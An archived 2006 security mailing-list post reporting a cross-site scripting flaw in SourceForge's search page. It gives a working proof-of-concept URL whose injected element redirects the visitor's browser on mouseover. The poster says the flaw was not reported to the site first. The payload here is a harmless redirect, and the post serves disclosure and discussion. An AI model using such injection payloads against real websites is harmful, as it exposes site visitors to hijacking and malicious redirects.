Vulnerability Development mailing list archives

Sourceforge.net XSS

From: the.spikey () gmail com
Date: 9 Apr 2006 18:13:31 -0000

Hey guys,
I found this kind of 'hole' in sf.net, you can exucute some code, not all.(i.e. you cannot use a / )
I have not reported this yet, i'm sorry :+


Try it out:

http://sourceforge.net/search/?type_of_search=soft&forum_id=0&group_id=0&atid=0&words=<span style="position: fixed; 
top: 0px; left: 0px; color: red; width: 1000px; height: 1000px" 
onmouseOver="javascript:window.location='http://www.google.nl'";>&Search=Search

Spiked
www.geekshangout.org

Current thread:

Sourceforge.net XSS the . spikey (Apr 09)
- <Possible follow-ups>
- Re: Sourceforge.net XSS v9 (Apr 12)
  - Re: Sourceforge.net XSS Daniel (Apr 12)
- Re: Re: Sourceforge.net XSS v9 (Apr 13)
  - Re: Sourceforge.net XSS ascii (Apr 13)
- Re: Sourceforge.net XSS Juan C Calderon (Apr 17)
  - Re: Sourceforge.net XSS v9 (Apr 17)
    - Re: Sourceforge.net XSS morgan allen (Apr 18)
    - Re: Sourceforge.net XSS Valdis . Kletnieks (Apr 18)
    - Re: Sourceforge.net XSS Juan C Calderon (Apr 18)